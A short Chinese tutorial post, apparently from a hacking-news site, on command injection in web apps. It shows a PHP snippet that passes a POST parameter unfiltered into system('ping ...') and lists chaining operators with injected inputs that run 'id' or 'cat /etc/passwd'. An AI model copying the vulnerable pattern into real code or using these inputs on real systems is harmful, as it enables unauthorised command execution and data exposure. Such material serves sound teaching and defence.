命令执行漏洞与利用

命令执行漏洞与利用

黑客资讯访客1970-01-01 8:00:002833A+A-

在部分WEB应用里,应用程序会提供一些命令执行操作,如没有过滤好用户输入的数据,就有可能产生命令执行漏洞 从而执行有危害系统命令。

<?php
if($_POST['ip']){
       echo system('ping '.$_POST['ip']);
}
?>



命令连接符号总结

command1&& command2 先执行command1后执行command2

127.0.0.1&&  id
command1 |command2 只执行command2
1559793081156893.png
command1 &command2

先执行command1后执行command2 127.0.0.1 -c 3& cat /etc/passwd

1559793107139706.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 3条评论
  • 依疚杞胭2022-06-03 09:57:14
  • $_POST['ip']);}?>命令连接符号总结command1&& command2 先执行command1后执行command2127.0.0.1&&  idcommand1 |comman
  • 森槿雾敛2022-06-03 01:57:09
  • ']){       echo system('ping '.$_POST['ip']);}?>命令连接符号总结command1&& command2
  • 南殷清引2022-06-03 05:57:19
  • 令连接符号总结command1&& command2 先执行command1后执行command2127.0.0.1&&  idcommand1 |command2 只执行command2command1 &command2先执行com

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理